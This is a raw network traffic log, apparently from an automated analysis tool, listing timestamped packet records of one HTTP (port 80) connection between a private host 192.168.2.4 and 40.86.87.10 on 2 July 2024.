Jul 2, 2024 07:31:03.036850929 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036865950 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036875010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036884069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036887884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.036894083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036904097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036914110 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036916018 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.036926985 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036931992 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036957026 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.036972046 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.037502050 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.037544966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.037656069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.037667036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.037677050 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.037687063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.037695885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.037698030 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.037708998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.037718058 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.037719011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.037731886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.037740946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.037748098 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.037751913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.037761927 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.037770033 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.037771940 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.037790060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.037813902 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.038651943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.038662910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.038671970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.038681984 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.038691998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.038695097 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.038702011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.038712978 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.038719893 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.038722992 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.038738012 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.038748026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.038758039 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.038762093 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.038769007 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.038779020 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.038779020 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.038801908 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.038824081 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.039649010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.039659977 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.039669991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.039680004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.039689064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.039694071 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.039700031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.039709091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.039720058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.039724112 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.039730072 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.039738894 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.039748907 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.039762974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.039767027 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.039793968 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.039808989 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.040586948 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.040596962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.040606976 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.040616035 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.040628910 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.040630102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.040640116 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.040644884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.040649891 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.040659904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.040669918 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.040678024 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.040680885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.040693998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.040703058 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.040703058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.040724039 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.040741920 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.041460037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.041470051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.041484118 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.041493893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.041507959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.041507959 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.041552067 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.041560888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.041572094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.041574001 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.041580915 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.041590929 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.041600943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.041603088 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.041610956 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.041619062 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.041620016 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.041630030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.041640043 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.041662931 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.041681051 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.041699886 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.158189058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.158212900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.158222914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.158351898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.158366919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.158376932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.158386946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.158401966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.158401966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.158401966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.158428907 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.158444881 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.158642054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.158694029 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.158724070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.158734083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.158742905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.158752918 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.158762932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.158771038 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.158773899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.158798933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.158830881 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.159176111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.159185886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.159194946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.159204006 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.159231901 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.159240961 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.159250975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.159257889 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.159260988 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.159271955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.159281015 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.159281015 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.159303904 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.159327030 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.159852028 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.159862995 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.159873009 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.159898043 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.159925938 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.160077095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.160085917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.160118103 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.160144091 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.160207987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.160218954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.160228014 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.160237074 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.160247087 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.160248041 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.160255909 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.160265923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.160270929 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.160275936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.160288095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.160298109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.160303116 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.160306931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.160326004 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.160356045 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.161161900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.161173105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.161180973 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.161190987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.161200047 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.161210060 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.161211014 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.161220074 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.161231995 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.161238909 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.161242008 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.161252022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.161263943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.161271095 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.161273003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.161292076 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.161315918 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.162179947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.162192106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.162200928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.162210941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.162220955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.162225962 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.162231922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.162240982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.162250996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.162254095 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.162260056 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.162265062 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.162273884 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.162285089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.162286043 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.162306070 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.162331104 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.163139105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.163177967 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.163188934 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.163198948 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.163208008 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.163212061 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.163218975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.163228035 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.163238049 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.163247108 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.163249969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.163260937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.163270950 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.163276911 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.163280964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.163290024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.163295031 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.163316965 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.163338900 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.164092064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.164102077 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.164110899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.164120913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.164129019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.164143085 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.164149046 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.164161921 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.164170980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.164180994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.164190054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.164190054 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.164201021 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.164210081 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.164217949 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.164242029 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.164261103 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.165009022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.165023088 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.165033102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.165041924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.165052891 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.165055037 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.165062904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.165080070 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.165113926 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.248645067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.248702049 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.281194925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.281224966 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.281251907 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.281271935 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.281307936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.281318903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.281347990 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.281362057 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.281435013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.281466007 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.281514883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.281548977 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.281563997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.281579018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.281589031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.281608105 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.281622887 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.281969070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.281979084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.281989098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.281999111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.282005072 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.282022953 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.282063961 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.282263994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.282274008 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.282283068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.282296896 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.282306910 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.282344103 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.282360077 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.282371998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.282381058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.282392025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.282396078 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.282401085 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.282411098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.282422066 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.282423019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.282433033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.282452106 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.282476902 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.283325911 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.283339977 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.283349037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.283359051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.283368111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.283377886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.283381939 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.283387899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.283392906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.283406019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.283412933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.283415079 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.283425093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.283433914 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.283436060 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.283446074 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.283452034 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.283473969 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.283485889 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.284328938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.284339905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.284348011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.284358025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.284365892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.284375906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.284384966 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.284384966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.284394979 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.284404039 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.284414053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.284419060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.284425974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.284440041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.284442902 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.284449100 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.284461975 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.284478903 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.284504890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.285228014 CEST	80	49730	40.86.87.10	192.168.2.4
